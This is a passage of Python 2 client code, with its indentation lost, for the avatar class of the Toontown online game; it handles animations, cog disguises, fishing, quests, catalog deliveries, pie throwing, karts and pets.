self.tunnelTrack = Sequence(Wait(-tOffset), self.tunnelTrack)
self.tunnelTrack.start()
else:
self.tunnelTrack.start(tOffset)
def enterTeleportOut(self, *args, **kw):
Toon.Toon.enterTeleportOut(self, *args, **kw)
if self.track:
self.track.delayDelete = DelayDelete.DelayDelete(self, 'enterTeleportOut')
def exitTeleportOut(self):
if self.track != None:
DelayDelete.cleanupDelayDeletes(self.track)
Toon.Toon.exitTeleportOut(self)
return
def b_setAnimState(self, animName, animMultiplier=1.0, callback=None, extraArgs=[]):
self.d_setAnimState(animName, animMultiplier, None, extraArgs)
self.setAnimState(animName, animMultiplier, None, None, callback, extraArgs)
return
def d_setAnimState(self, animName, animMultiplier=1.0, timestamp=None, extraArgs=[]):
timestamp = globalClockDelta.getFrameNetworkTime()
self.sendUpdate('setAnimState', [animName, animMultiplier, timestamp])
def setAnimState(self, animName, animMultiplier=1.0, timestamp=None, animType=None, callback=None, extraArgs=[]):
if not animName or animName == 'None':
return
if timestamp == None:
ts = 0.0
else:
ts = globalClockDelta.localElapsedTime(timestamp)
if base.config.GetBool('check-invalid-anims', True):
if animMultiplier > 1.0 and animName in ('neutral', ):
animMultiplier = 1.0
if self.animFSM.getStateNamed(animName):
self.animFSM.request(animName, [animMultiplier,
ts,
callback,
extraArgs])
self.cleanupPieInHand()
return
def b_setEmoteState(self, animIndex, animMultiplier):
self.setEmoteState(animIndex, animMultiplier)
self.d_setEmoteState(animIndex, animMultiplier)
def d_setEmoteState(self, animIndex, animMultiplier):
timestamp = globalClockDelta.getFrameNetworkTime()
self.sendUpdate('setEmoteState', [animIndex, animMultiplier, timestamp])
def setEmoteState(self, animIndex, animMultiplier, timestamp=None):
if animIndex == TTEmote.EmoteClear:
return
else:
if timestamp == None:
ts = 0.0
else:
ts = globalClockDelta.localElapsedTime(timestamp)
callback = None
extraArgs = []
extraArgs.insert(0, animIndex)
self.doEmote(animIndex, animMultiplier, ts, callback, extraArgs)
return
def setCogStatus(self, cogStatusList):
self.cogs = cogStatusList
def setCogCount(self, cogCountList):
self.cogCounts = cogCountList
if hasattr(self, 'suitPage'):
self.suitPage.updatePage()
def setCogRadar(self, radar):
self.cogRadar = radar
if hasattr(self, 'suitPage'):
self.suitPage.updateCogRadarButtons(radar)
def setBuildingRadar(self, radar):
self.buildingRadar = radar
if hasattr(self, 'suitPage'):
self.suitPage.updateBuildingRadarButtons(radar)
def setCogTypes(self, types):
self.cogTypes = types
if self.disguisePage:
self.disguisePage.updatePage()
def setCogLevels(self, levels):
self.cogLevels = levels
if self.disguisePage:
self.disguisePage.updatePage()
def getCogLevels(self):
return self.cogLevels
def setCogParts(self, parts):
self.cogParts = parts
if self.disguisePage:
self.disguisePage.updatePage()
def getCogParts(self):
return self.cogParts
def setCogMerits(self, merits):
self.cogMerits = merits
if self.disguisePage:
self.disguisePage.updatePage()
def readyForPromotion(self, dept):
merits = base.localAvatar.cogMerits[dept]
totalMerits = CogDisguiseGlobals.getTotalMerits(self, dept)
if merits >= totalMerits:
return 1
else:
return 0
def setCogIndex(self, index, cogType=0):
self.cogIndex = (index, cogType)
if self.cogIndex[0] == -1:
if self.isDisguised:
self.takeOffSuit()
else:
if -1 <= index <= 3:
cogIndex = self.cogTypes[index] + SuitDNA.suitsPerDept * index
cog = SuitDNA.suitHeadTypes[cogIndex]
else:
cog = SuitDNA.extraSuitsIndex2Head.get(index)
if cogType in ToontownGlobals.PutOnSuitRental:
self.putOnSuit(index, cogType=cogType, rental=True)
else:
self.putOnSuit(cog, cogType=cogType)
def getCogIndex(self):
return self.cogIndex
def setCharIndex(self, index):
if index == -1:
if self.isClassicChar:
self.becomeToon()
else:
self.becomeChar(index)
def setTPose(self):
if self.isDisguised:
self.updateToonDNA(self.style, 1, True)
self.generateToonAccessories()
suitType = self.suit.style.name
cogType = self.isCog
if self.suit.isRental:
index = ToontownGlobals.CogDepts.index(self.suit.style.dept)
self.putOnSuit(suitType=index, setDisplayName=True, cogType=cogType, rental=True, tpose=True)
else:
self.putOnSuit(suitType=suitType, setDisplayName=True, cogType=cogType, tpose=True)
elif self.isClassicChar:
charType = CharDNA.charTypes.index(self.char.style.name)
self.becomeChar(charType, True)
else:
self.updateToonDNA(self.style, 1, True)
self.generateToonAccessories()
def setMuzzle(self, muzzle):
self.hideNormalMuzzle()
self.hideSurpriseMuzzle()
self.hideSadMuzzle()
self.hideSmileMuzzle()
self.hideAngryMuzzle()
self.hideLaughMuzzle()
if muzzle == 0:
self.showNormalMuzzle()
elif muzzle == 1:
self.showSurpriseMuzzle()
elif muzzle == 2:
self.showSadMuzzle()
elif muzzle == 3:
self.showSmileMuzzle()
elif muzzle == 4:
self.showAngryMuzzle()
elif muzzle == 5:
self.showLaughMuzzle()
def setEyes(self, eyes):
Toon.Toon.setEyes(self, eyes)
def isCog(self):
if self.cogIndex[0] == -1:
return 0
else:
return 1
def setDisguisePageFlag(self, flag):
if flag and hasattr(self, 'book'):
self.loadDisguisePages()
self.disguisePageFlag = flag
def setSosPageFlag(self, flag):
if flag and hasattr(self, 'book'):
self.loadSosPages()
self.sosPageFlag = flag
def setFishCollection(self, genusList, speciesList, weightList):
self.fishCollection = FishCollection.FishCollection()
self.fishCollection.makeFromNetLists(genusList, speciesList, weightList)
def getFishCollection(self):
return self.fishCollection
def setMaxFishTank(self, maxTank):
self.maxFishTank = maxTank
def getMaxFishTank(self):
return self.maxFishTank
def setFishTank(self, genusList, speciesList, weightList):
self.fishTank = FishTank.FishTank()
self.fishTank.makeFromNetLists(genusList, speciesList, weightList)
messenger.send(self.uniqueName('fishTankChange'))
def getFishTank(self):
return self.fishTank
def isFishTankFull(self):
return len(self.fishTank) >= self.maxFishTank
def setFishingRod(self, rodId):
self.fishingRod = rodId
def getFishingRod(self):
return self.fishingRod
def setFishingTrophies(self, trophyList):
self.fishingTrophies = trophyList
def getFishingTrophies(self):
return self.fishingTrophies
def setQuests(self, flattenedQuests):
questList = []
questLen = 5
for i in xrange(0, len(flattenedQuests), questLen):
questList.append(flattenedQuests[i:i + questLen])
self.quests = questList
if self == base.localAvatar:
messenger.send('questsChanged')
def setQuestCarryLimit(self, limit):
self.questCarryLimit = limit
if self == base.localAvatar:
messenger.send('questsChanged')
def getQuestCarryLimit(self):
return self.questCarryLimit
def d_requestDeleteQuest(self, questDesc):
self.sendUpdate('requestDeleteQuest', [list(questDesc)])
def setMaxCarry(self, maxCarry):
self.maxCarry = maxCarry
if self.inventory:
self.inventory.updateGUI()
def getMaxCarry(self):
return self.maxCarry
def setCheesyEffect(self, effect, hoodId, expireTime):
self.savedCheesyEffect = effect
self.savedCheesyHoodId = hoodId
self.savedCheesyExpireTime = expireTime
if self == base.localAvatar:
self.notify.debug('setCheesyEffect(%s, %s, %s)' % (effect, hoodId, expireTime))
if effect != ToontownGlobals.CENormal:
serverTime = time.time() + self.cr.getServerDelta()
duration = expireTime * 60 - serverTime
if duration < 0:
self.notify.debug('effect should have expired %s ago.' % PythonUtil.formatElapsedSeconds(-duration))
else:
self.notify.debug('effect will expire in %s.' % PythonUtil.formatElapsedSeconds(duration))
if self.activeState == DistributedObject.ESGenerated:
self.reconsiderCheesyEffect(lerpTime=0.5)
else:
self.reconsiderCheesyEffect()
def reconsiderCheesyEffect(self, lerpTime=0):
effect = self.savedCheesyEffect
hoodId = self.savedCheesyHoodId
if not self.cr.areCheesyEffectsAllowed():
effect = CENormal
if hoodId != 0:
try:
currentHoodId = base.cr.playGame.hood.id
except:
currentHoodId = None
if hoodId == 1:
if currentHoodId == ToontownGlobals.ToontownCentral:
effect = CENormal
elif currentHoodId != None and currentHoodId != hoodId:
effect = CENormal
if self.ghostMode:
effect = CEGhost
self.applyCheesyEffect(effect, lerpTime=lerpTime)
return
def setGhostMode(self, flag):
if self.ghostMode != flag:
self.ghostMode = flag
if not hasattr(self, 'cr'):
return
if self.activeState <= DistributedObject.ESDisabled:
self.notify.debug('not applying cheesy effect to disabled Toon')
elif self.activeState == DistributedObject.ESGenerating:
self.reconsiderCheesyEffect()
elif self.activeState == DistributedObject.ESGenerated:
self.reconsiderCheesyEffect(lerpTime=0.5)
else:
self.notify.warning('unknown activeState: %s' % self.activeState)
self.showNametag2d()
self.showNametag3d()
if hasattr(self, 'collNode'):
if self.ghostMode:
self.collNode.setCollideMask(ToontownGlobals.GhostBitmask)
else:
self.collNode.setCollideMask(ToontownGlobals.WallBitmask | ToontownGlobals.PieBitmask)
if self.isLocal():
if self.ghostMode:
self.useGhostControls()
else:
self.useWalkControls()
if hasattr(base, 'wantPets') and base.wantPets:
def setPetTrickPhrases(self, petTricks):
self.petTrickPhrases = petTricks
if self.isLocal():
messenger.send('petTrickPhrasesChanged')
def setCustomMessages(self, customMessages):
self.customMessages = customMessages
if self.isLocal():
messenger.send('customMessagesChanged')
def setResistanceMessages(self, resistanceMessages):
self.resistanceMessages = resistanceMessages
if self.isLocal():
messenger.send('resistanceMessagesChanged')
def getResistanceMessageCharges(self, textId):
msgs = self.resistanceMessages
for i in xrange(len(msgs)):
if msgs[i][0] == textId:
return msgs[i][1]
return 0
def setCatalogSchedule(self, currentWeek, nextTime):
self.catalogScheduleCurrentWeek = currentWeek
self.catalogScheduleNextTime = nextTime
if self.isLocal():
self.notify.debug('setCatalogSchedule(%s, %s)' % (currentWeek, nextTime))
if nextTime:
serverTime = time.time() + self.cr.getServerDelta()
duration = nextTime * 60 - serverTime
self.notify.debug('next catalog in %s.' % PythonUtil.formatElapsedSeconds(duration))
def setCatalog(self, monthlyCatalog, weeklyCatalog, backCatalog):
self.monthlyCatalog = CatalogItemList.CatalogItemList(monthlyCatalog)
self.weeklyCatalog = CatalogItemList.CatalogItemList(weeklyCatalog)
self.backCatalog = CatalogItemList.CatalogItemList(backCatalog)
if self.catalogNotify == ToontownGlobals.NewItems:
self.catalogNotify = ToontownGlobals.OldItems
def setCatalogNotify(self, catalogNotify, mailboxNotify):
if len(self.weeklyCatalog) + len(self.monthlyCatalog) == 0:
catalogNotify = ToontownGlobals.NoItems
if len(self.mailboxContents) == 0:
mailboxNotify = ToontownGlobals.NoItems
self.catalogNotify = catalogNotify
self.mailboxNotify = mailboxNotify
if self.isLocal():
self.gotCatalogNotify = 1
self.refreshOnscreenButtons()
print 'local'
def setDeliverySchedule(self, onOrder):
self.onOrder = CatalogItemList.CatalogItemList(onOrder, store=CatalogItem.Customization | CatalogItem.DeliveryDate)
if self == base.localAvatar:
nextTime = self.onOrder.getNextDeliveryDate()
if nextTime != None:
serverTime = time.time() + self.cr.getServerDelta()
duration = nextTime * 60 - serverTime
self.notify.debug('next delivery in %s.' % PythonUtil.formatElapsedSeconds(duration))
messenger.send('setDeliverySchedule-%s' % self.doId)
return
def setMailboxContents(self, mailboxContents):
self.mailboxContents = CatalogItemList.CatalogItemList(mailboxContents, store=CatalogItem.Customization)
messenger.send('setMailboxContents-%s' % self.doId)
def setAwardSchedule(self, onOrder):
self.onAwardOrder = CatalogItemList.CatalogItemList(onOrder, store=CatalogItem.Customization | CatalogItem.DeliveryDate)
if self == base.localAvatar:
nextTime = self.onAwardOrder.getNextDeliveryDate()
if nextTime != None:
serverTime = time.time() + self.cr.getServerDelta()
duration = nextTime * 60 - serverTime
self.notify.debug('next delivery in %s.' % PythonUtil.formatElapsedSeconds(duration))
messenger.send('setAwardSchedule-%s' % self.doId)
return
def setAwardMailboxContents(self, awardMailboxContents):
self.notify.debug('Setting awardMailboxContents to %s.' % awardMailboxContents)
self.awardMailboxContents = CatalogItemList.CatalogItemList(awardMailboxContents, store=CatalogItem.Customization)
self.notify.debug('awardMailboxContents is %s.' % self.awardMailboxContents)
messenger.send('setAwardMailboxContents-%s' % self.doId)
def setAwardNotify(self, awardNotify):
self.notify.debug('setAwardNotify( %s )' % awardNotify)
self.awardNotify = awardNotify
if self.isLocal():
self.gotCatalogNotify = 1
self.refreshOnscreenButtons()
def setGiftSchedule(self, onGiftOrder):
self.onGiftOrder = CatalogItemList.CatalogItemList(onGiftOrder, store=CatalogItem.Customization | CatalogItem.DeliveryDate)
if self == base.localAvatar:
nextTime = self.onGiftOrder.getNextDeliveryDate()
if nextTime != None:
serverTime = time.time() + self.cr.getServerDelta()
duration = nextTime * 60 - serverTime
self.notify.debug('next delivery in %s.' % PythonUtil.formatElapsedSeconds(duration))
return
def playSplashEffect(self, x, y, z):
if localAvatar.zoneId not in [ToontownGlobals.DonaldsDock, ToontownGlobals.OutdoorZone] and (not hasattr(localAvatar, 'inEstate') or localAvatar.inEstate != 1):
if random.random() < 0.1:
self.sendLogSuspiciousEvent('AvatarHackWarning! playing hacked splash effect')
return
from toontown.effects import Splash
if self.splash == None:
self.splash = Splash.Splash(render)
self.splash.setPos(x, y, z)
self.splash.setScale(2)
self.splash.play()
place = base.cr.playGame.getPlace()
if place:
if hasattr(place.loader, 'submergeSound'):
base.playSfx(place.loader.submergeSound, node=self)
return
def d_playSplashEffect(self, x, y, z):
self.sendUpdate('playSplashEffect', [x, y, z])
def setTrackAccess(self, trackArray):
self.trackArray = trackArray
if self.inventory:
self.inventory.updateGUI()
def getTrackAccess(self):
return self.trackArray
def hasTrackAccess(self, track):
return self.trackArray[track]
def setTrackProgress(self, trackId, progress):
self.trackProgressId = trackId
self.trackProgress = progress
if hasattr(self, 'trackPage'):
self.trackPage.updatePage()
def getTrackProgress(self):
return [
self.trackProgressId, self.trackProgress]
def getTrackProgressAsArray(self, maxLength=15):
shifts = map(operator.rshift, maxLength * [self.trackProgress], xrange(maxLength - 1, -1, -1))
digits = map(operator.mod, shifts, maxLength * [2])
digits.reverse()
return digits
def setTeleportAccess(self, teleportZoneArray):
self.teleportZoneArray = teleportZoneArray
def getTeleportAccess(self):
return self.teleportZoneArray
def hasTeleportAccess(self, zoneId):
return zoneId in self.teleportZoneArray
def setQuestHistory(self, questList):
self.questHistory = questList
def getQuestHistory(self):
return self.questHistory
def setRewardHistory(self, rewardTier, rewardList):
self.rewardTier = rewardTier
self.rewardHistory = rewardList
def getRewardHistory(self):
return (
self.rewardTier, self.rewardHistory)
def doSmoothTask(self, task):
self.smoother.computeAndApplySmoothPosHpr(self, self)
self.setSpeed(self.smoother.getSmoothForwardVelocity(), self.smoother.getSmoothRotationalVelocity())
return Task.cont
def d_setParent(self, parentToken):
DistributedSmoothNode.DistributedSmoothNode.d_setParent(self, parentToken)
def setEmoteAccess(self, bits):
self.emoteAccess = bits
if self == base.localAvatar:
messenger.send('emotesChanged')
def b_setHouseId(self, id):
self.setHouseId(id)
self.d_setHouseId(id)
def d_setHouseId(self, id):
self.sendUpdate('setHouseId', [id])
def setHouseId(self, id):
self.houseId = id
def getHouseId(self):
return self.houseId
def setPosIndex(self, index):
self.posIndex = index
def getPosIndex(self):
return self.posIndex
def b_setSpeedChatStyleIndex(self, index):
realIndexToSend = 0
if type(index) == type(0) and 0 <= index and index < len(speedChatStyles):
realIndexToSend = index
else:
base.cr.centralLogger.writeClientEvent('Hacker alert b_setSpeedChatStyleIndex invalid')
self.setSpeedChatStyleIndex(realIndexToSend)
self.d_setSpeedChatStyleIndex(realIndexToSend)
return
def d_setSpeedChatStyleIndex(self, index):
realIndexToSend = 0
if type(index) == type(0) and 0 <= index and index < len(speedChatStyles):
realIndexToSend = index
else:
base.cr.centralLogger.writeClientEvent('Hacker alert d_setSpeedChatStyleIndex invalid')
self.sendUpdate('setSpeedChatStyleIndex', [realIndexToSend])
def setSpeedChatStyleIndex(self, index):
realIndexToUse = 0
if type(index) == type(0) and 0 <= index and index < len(speedChatStyles):
realIndexToUse = index
else:
base.cr.centralLogger.writeClientEvent('Hacker victim setSpeedChatStyleIndex invalid attacking toon = %d' % self.doId)
self.speedChatStyleIndex = realIndexToUse
nameKey, arrowColor, rolloverColor, frameColor = speedChatStyles[realIndexToUse]
self.nametag.setQtColor(VBase4(frameColor[0], frameColor[1], frameColor[2], 1))
if self.isLocal():
messenger.send('SpeedChatStyleChange', [])
def getSpeedChatStyleIndex(self):
return self.speedChatStyleIndex
def setMaxMoney(self, maxMoney):
self.maxMoney = maxMoney
def getMaxMoney(self):
return self.maxMoney
def setMoney(self, money):
if money != self.money:
self.money = money
messenger.send(self.uniqueName('moneyChange'), [self.money])
def getMoney(self):
return self.money
def setMaxBankMoney(self, maxMoney):
self.maxBankMoney = maxMoney
def getMaxBankMoney(self):
return self.maxBankMoney
def setBankMoney(self, money):
self.bankMoney = money
messenger.send(self.uniqueName('bankMoneyChange'), [self.bankMoney])
def getBankMoney(self):
return self.bankMoney
def getTotalMoney(self):
return self.getBankMoney() + self.getMoney()
def setEmblems(self, emblems):
if self.emblems != emblems:
self.emblems = emblems
messenger.send(self.uniqueName('emblemsChange'), [self.emblems])
def getEmblems(self):
return self.emblems
def isEnoughEmblemsToBuy(self, itemEmblemPrices):
for emblemIndex, emblemPrice in enumerate(itemEmblemPrices):
if emblemIndex >= len(self.emblems):
return False
if self.emblems[emblemIndex] < emblemPrice:
return False
return True
def isEnoughMoneyAndEmblemsToBuy(self, moneyPrice, itemEmblemPrices):
if self.getTotalMoney() < moneyPrice:
return False
for emblemIndex, emblemPrice in enumerate(itemEmblemPrices):
if emblemIndex >= len(self.emblems):
return False
if self.emblems[emblemIndex] < emblemPrice:
return False
return True
def presentPie(self, x, y, z, h, p, r, timestamp32):
if self.numPies <= 0:
return
else:
if not launcher.getPhaseComplete(5):
return
lastTossTrack = Sequence()
if self.tossTrack:
lastTossTrack = self.tossTrack
tossTrack = None
ts = globalClockDelta.localElapsedTime(timestamp32, bits=32)
ts -= self.smoother.getDelay()
ival = self.getPresentPieInterval(x, y, z, h, p, r)
if ts > 0:
startTime = ts
lastTossTrack.finish()
else:
ival = Sequence(Wait(-ts), ival)
lastTossTrack.finish()
startTime = 0
ival = Sequence(ival)
ival.start(startTime)
self.tossTrack = ival
return
def tossPie(self, x, y, z, h, p, r, sequence, power, timestamp32):
if self.numPies <= 0:
return
else:
if self.numPies != ToontownGlobals.FullPies:
self.setNumPies(self.numPies - 1)
self.lastTossedPie = globalClock.getFrameTime()
if not launcher.getPhaseComplete(5):
return
lastTossTrack = Sequence()
if self.tossTrack:
lastTossTrack = self.tossTrack
tossTrack = None
lastPieTrack = Sequence()
if sequence in self.pieTracks:
lastPieTrack = self.pieTracks[sequence]
del self.pieTracks[sequence]
ts = globalClockDelta.localElapsedTime(timestamp32, bits=32)
ts -= self.smoother.getDelay()
toss, pie, flyPie = self.getTossPieInterval(x, y, z, h, p, r, power)
if ts > 0:
startTime = ts
lastTossTrack.finish()
lastPieTrack.finish()
else:
toss = Sequence(Wait(-ts), toss)
pie = Sequence(Wait(-ts), pie)
lastTossTrack.finish()
lastPieTrack.finish()
startTime = 0
self.tossTrack = toss
toss.start(startTime)
pie = Sequence(pie, Func(self.pieFinishedFlying, sequence))
self.pieTracks[sequence] = pie
pie.start(startTime)
return
def pieFinishedFlying(self, sequence):
if sequence in self.pieTracks:
del self.pieTracks[sequence]
def pieFinishedSplatting(self, sequence):
if sequence in self.splatTracks:
del self.splatTracks[sequence]
def pieSplat(self, x, y, z, sequence, pieCode, timestamp32):
if self.isLocal():
return
elapsed = globalClock.getFrameTime() - self.lastTossedPie
if elapsed > 30:
return
if not launcher.getPhaseComplete(5):
return
lastPieTrack = Sequence()
if sequence in self.pieTracks:
lastPieTrack = self.pieTracks[sequence]
del self.pieTracks[sequence]
if sequence in self.splatTracks:
lastSplatTrack = self.splatTracks[sequence]
del self.splatTracks[sequence]
lastSplatTrack.finish()
ts = globalClockDelta.localElapsedTime(timestamp32, bits=32)
ts -= self.smoother.getDelay()
splat = self.getPieSplatInterval(x, y, z, pieCode)
splat = Sequence(Func(messenger.send, 'pieSplat', [self, pieCode]), splat)
if ts > 0:
startTime = ts
lastPieTrack.finish()
else:
splat = Sequence(Wait(-ts), splat)
startTime = 0
splat = Sequence(splat, Func(self.pieFinishedSplatting, sequence))
self.splatTracks[sequence] = splat
splat.start(startTime)
def cleanupPies(self):
for track in self.pieTracks.values():
track.finish()
self.pieTracks = {}
for track in self.splatTracks.values():
track.finish()
self.splatTracks = {}
self.cleanupPieInHand()
def cleanupPieInHand(self):
if self.tossTrack:
self.tossTrack.finish()
self.tossTrack = None
self.cleanupPieModel()
return
def setNumPies(self, numPies):
self.numPies = numPies
if self.isLocal():
self.updatePieButton()
if numPies == 0:
self.interruptPie()
def setPieType(self, pieType):
self.pieType = pieType
if self.isLocal():
self.updatePieButton()
def setTrophyScore(self, score):
self.trophyScore = score
if self.trophyStar != None:
self.trophyStar.removeNode()
self.trophyStar = None
if self.trophyStarSpeed != 0:
taskMgr.remove(self.uniqueName('starSpin'))
self.trophyStarSpeed = 0
if hasattr(self, 'gmIcon') and self.gmIcon:
return
else:
if self.trophyScore >= ToontownGlobals.TrophyStarLevels[4]:
self.trophyStar = loader.loadModel('phase_3.5/models/gui/name_star')
self.trophyStar.reparentTo(self.nametag.getNameIcon())
self.trophyStar.setScale(2)
self.trophyStar.setZ(2)
self.trophyStar.setColor(ToontownGlobals.TrophyStarColors[4])
self.trophyStarSpeed = 15
if self.trophyScore >= ToontownGlobals.TrophyStarLevels[5]:
taskMgr.add(self.__starSpin, self.uniqueName('starSpin'))
elif self.trophyScore >= ToontownGlobals.TrophyStarLevels[2]:
self.trophyStar = loader.loadModel('phase_3.5/models/gui/name_star')
self.trophyStar.reparentTo(self.nametag.getNameIcon())
self.trophyStar.setScale(1.5)
self.trophyStar.setZ(1.6)
self.trophyStar.setColor(ToontownGlobals.TrophyStarColors[2])
self.trophyStarSpeed = 10
if self.trophyScore >= ToontownGlobals.TrophyStarLevels[3]:
taskMgr.add(self.__starSpin, self.uniqueName('starSpin'))
elif self.trophyScore >= ToontownGlobals.TrophyStarLevels[0]:
self.trophyStar = loader.loadModel('phase_3.5/models/gui/name_star')
self.trophyStar.reparentTo(self.nametag.getNameIcon())
self.trophyStar.setScale(1.5)
self.trophyStar.setZ(1.6)
self.trophyStar.setColor(ToontownGlobals.TrophyStarColors[0])
self.trophyStarSpeed = 8
if self.trophyScore >= ToontownGlobals.TrophyStarLevels[1]:
taskMgr.add(self.__starSpin, self.uniqueName('starSpin'))
return
def __starSpin(self, task):
now = globalClock.getFrameTime()
r = now * self.trophyStarSpeed % 360.0
self.trophyStar.setR(r)
return Task.cont
def getZoneId(self):
place = base.cr.playGame.getPlace()
if place:
return place.getZoneId()
else:
return
return
def getRequestID(self):
return CLIENT_GET_AVATAR_DETAILS
def announceBingo(self):
self.setChatAbsolute(TTLocalizer.FishBingoBingo, CFSpeech | CFTimeout)
def squish(self, damage, noAnim=False):
if self == base.localAvatar:
if not noAnim:
base.cr.playGame.getPlace().fsm.request('squished')
self.stunToon()
self.setZ(self.getZ(render) + 0.025)
def d_squish(self, damage):
self.sendUpdate('squish', [damage])
def b_squish(self, damage, noAnim=False):
if not self.isStunned:
self.squish(damage, noAnim)
self.d_squish(damage)
self.playDialogueForString('!')
def getShadowJoint(self):
return Toon.Toon.getShadowJoint(self)
if base.wantKarts:
def hasKart(self):
return self.kartDNA[KartDNA.bodyType] != -1
def getKartDNA(self):
return self.kartDNA
def setTickets(self, numTickets):
self.tickets = numTickets
def getTickets(self):
return self.tickets
def getAccessoryByType(self, accType):
return self.kartDNA[accType]
def setCurrentKart(self, avId):
self.kartId = avId
def releaseKart(self):
self.kartId = None
return
def setKartBodyType(self, bodyType):
self.kartDNA[KartDNA.bodyType] = bodyType
def getKartBodyType(self):
return self.kartDNA[KartDNA.bodyType]
def setKartBodyColor(self, bodyColor):
self.kartDNA[KartDNA.bodyColor] = bodyColor
def getKartBodyColor(self):
return self.kartDNA[KartDNA.bodyColor]
def setKartAccessoryColor(self, accColor):
self.kartDNA[KartDNA.accColor] = accColor
def getKartAccessoryColor(self):
return self.kartDNA[KartDNA.accColor]
def setKartEngineBlockType(self, ebType):
self.kartDNA[KartDNA.ebType] = ebType
def getKartEngineBlockType(self):
return self.kartDNA[KartDNA.ebType]
def setKartSpoilerType(self, spType):
self.kartDNA[KartDNA.spType] = spType
def getKartSpoilerType(self):
return self.kartDNA[KartDNA.spType]
def setKartFrontWheelWellType(self, fwwType):
self.kartDNA[KartDNA.fwwType] = fwwType
def getKartFrontWheelWellType(self):
return self.kartDNA[KartDNA.fwwType]
def setKartBackWheelWellType(self, bwwType):
self.kartDNA[KartDNA.bwwType] = bwwType
def getKartBackWheelWellType(self):
return self.kartDNA[KartDNA.bwwType]
def setKartRimType(self, rimsType):
self.kartDNA[KartDNA.rimsType] = rimsType
def setKartDecalType(self, decalType):
self.kartDNA[KartDNA.decalType] = decalType
def getKartDecalType(self):
return self.kartDNA[KartDNA.decalType]
def getKartRimType(self):
return self.kartDNA[KartDNA.rimsType]
def setKartAccessoriesOwned(self, accessories):
while len(accessories) < 16:
accessories.append(-1)
self.accessories = accessories
def getKartAccessoriesOwned(self):
owned = copy.deepcopy(self.accessories)
while InvalidEntry in owned:
owned.remove(InvalidEntry)
return owned
def requestKartDNAFieldUpdate(self, dnaField, fieldValue):
self.notify.debug('requestKartDNAFieldUpdate - dnaField %s, fieldValue %s' % (dnaField, fieldValue))
self.sendUpdate('updateKartDNAField', [dnaField, fieldValue])
def requestAddOwnedAccessory(self, accessoryId):
self.notify.debug('requestAddOwnedAccessor - purchased accessory %s' % accessoryId)
self.sendUpdate('addOwnedAccessory', [accessoryId])
def requestRemoveOwnedAccessory(self, accessoryId):
self.notify.debug('requestRemoveOwnedAccessor - removed accessory %s' % accessoryId)
self.sendUpdate('removeOwnedAccessory', [accessoryId])
def setKartingTrophies(self, trophyList):
self.kartingTrophies = trophyList
def getKartingTrophies(self):
return self.kartingTrophies
def setKartingHistory(self, history):
self.kartingHistory = history
def getKartingHistory(self):
return self.kartingHistory
def setKartingPersonalBest(self, bestTimes):
self.kartingPersonalBest = bestTimes
def getKartingPersonalBest(self):
return self.kartingPersonalBest
def setKartingPersonalBest2(self, bestTimes2):
self.kartingPersonalBest2 = bestTimes2
def getKartingPersonalBest2(self):
return self.kartingPersonalBest2
def getKartingPersonalBestAll(self):
return self.kartingPersonalBest + self.kartingPersonalBest2
if hasattr(base, 'wantPets') and base.wantPets:
def setPetId(self, petId):
self.petId = petId
if petId == 0:
self.petDNA = None
elif self.isLocal():
base.cr.addPetToFriendsMap()
return
def getPetId(self):
return self.petId
def getPetId(self):
return self.petId
def hasPet(self):
return self.petId != 0
def b_setPetTutorialDone(self, bDone):
self.d_setPetTutorialDone(bDone)
self.setPetTutorialDone(bDone)
def d_setPetTutorialDone(self, bDone):
self.sendUpdate('setPetTutorialDone', [bDone])
def setPetTutorialDone(self, bDone):
self.bPetTutorialDone = bDone
def b_setFishBingoTutorialDone(self, bDone):
self.d_setFishBingoTutorialDone(bDone)
self.setFishBingoTutorialDone(bDone)
def d_setFishBingoTutorialDone(self, bDone):
self.sendUpdate('setFishBingoTutorialDone', [bDone])
def setFishBingoTutorialDone(self, bDone):
self.bFishBingoTutorialDone = bDone
def b_setFishBingoMarkTutorialDone(self, bDone):
self.d_setFishBingoMarkTutorialDone(bDone)
self.setFishBingoMarkTutorialDone(bDone)
def d_setFishBingoMarkTutorialDone(self, bDone):
self.sendUpdate('setFishBingoMarkTutorialDone', [bDone])
def setFishBingoMarkTutorialDone(self, bDone):
self.bFishBingoMarkTutorialDone = bDone
def b_setPetMovie(self, petId, flag):
self.d_setPetMovie(petId, flag)
self.setPetMovie(petId, flag)
def d_setPetMovie(self, petId, flag):
self.sendUpdate('setPetMovie', [petId, flag])
def setPetMovie(self, petId, flag):
pass
def lookupPetDNA(self):
if self.petId and not self.petDNA:
from toontown.pets import PetDetail
PetDetail.PetDetail(self.petId, self.__petDetailsLoaded)
def __petDetailsLoaded(self, pet):
self.petDNA = pet.style
def trickOrTreatTargetMet(self, beanAmount):
if self.effect:
self.effect.stop()
self.effect = TrickOrTreatTargetEffect(beanAmount)
self.effect.play()
def trickOrTreatMilestoneMet(self):
if self.effect:
self.effect.stop()
self.effect = TrickOrTreatMilestoneEffect()
self.effect.play()
def winterCarolingTargetMet(self, beanAmount):
if self.effect:
self.effect.stop()
self.effect = WinterCarolingEffect(beanAmount)
self.effect.play()
def d_reqCogSummons(self, type, suitIndex):
if type == 'single':
pass
elif type == 'building':
pass
elif type == 'invasion':
pass
self.sendUpdate('reqCogSummons', [type, suitIndex])
def cogSummonsResponse(self, returnCode, suitIndex, doId):
messenger.send('cog-summons-response', [returnCode, suitIndex, doId])
def setCogSummonsEarned(self, cogSummonsEarned):
self.cogSummonsEarned = cogSummonsEarned
def getCogSummonsEarned(self):
return self.cogSummonsEarned
def hasCogSummons(self, suitIndex, type=None):
summons = self.getCogSummonsEarned()
curSetting = summons[suitIndex]
if type == 'single':
return curSetting & 1
if type == 'building':
return curSetting & 2
if type == 'invasion':
return curSetting & 4
return curSetting
def setFlowerCollection(self, speciesList, varietyList):
self.flowerCollection = FlowerCollection.FlowerCollection()
self.flowerCollection.makeFromNetLists(speciesList, varietyList)
def getFlowerCollection(self):
return self.flowerCollection
def setMaxFlowerBasket(self, maxFlowerBasket):
self.maxFlowerBasket = maxFlowerBasket
def getMaxFlowerBasket(self):
return self.maxFlowerBasket
def isFlowerBasketFull(self):
return len(self.flowerBasket) >= self.maxFlowerBasket
def setFlowerBasket(self, speciesList, varietyList):
self.flowerBasket = FlowerBasket.FlowerBasket()
self.flowerBasket.makeFromNetLists(speciesList, varietyList)
messenger.send('flowerBasketUpdated')
def getFlowerBasket(self):
return self.flowerBasket
def setShovel(self, shovelId):
self.shovel = shovelId
def attachShovel(self):
self.shovelModel = self.getShovelModel()
self.shovelModel.reparentTo(self.rightHand)
return self.shovelModel
def detachShovel(self):
if self.shovelModel:
self.shovelModel.removeNode()
def getShovelModel(self):
